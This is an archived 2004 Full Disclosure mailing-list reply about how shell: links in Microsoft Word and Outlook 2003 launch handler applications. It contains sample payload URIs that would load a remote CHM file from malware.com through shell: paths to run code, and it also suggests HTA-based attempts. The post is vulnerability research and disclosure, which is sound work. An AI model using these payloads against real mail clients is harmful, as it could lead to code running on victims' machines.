Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: MSN Messenger is vulnerable to the shell: hole
From: "http-equiv () excite com" <1 () malware com>
Date: Sun, 11 Jul 2004 16:17:29 -0000



<!-- 

Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft 
Word 10.2627.3311 launches Notepad. 

 -->

this can be very interesting. The same in Outlook 2003 both html 
and rich text. Good thing the named temp file deposits were 
magically patched.

As Andreas Sandblad mentioned the other day the assigned 
application will open depending on the file extension.

In Outlook 2003

shell:foo.hta will open an empty Html Application window
shell: foo.chm will run hh.exe with an error
shell: foo.js will run Windows Scripting Host with an error 
showing the full path where it is looking to run foo.js 
shell: foo.eml completely screws up Outlook Express with a 
series of errors

the idea then would be to run directly through the non-existent 
file it is trying to open e.g:

shell:foo.chm::http://www.malware.com//bad.chm::/foo.html

or

shell:C:foo.mht!http://www.malware.com//bad.chm::/foo.html

either that, or get something into shell:foo.hta or try to 
resurrect the named file in the temp. Lot of possibilities 
including embeddeding the file directly into the mail message 
and linking to it.

All needs to be thoroughly examined though. Which would be 
unfortunate for the peculiar completely clueless few who think 
that you just "flick" a switch and the fireworks begin.

-- 
http://www.malware.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault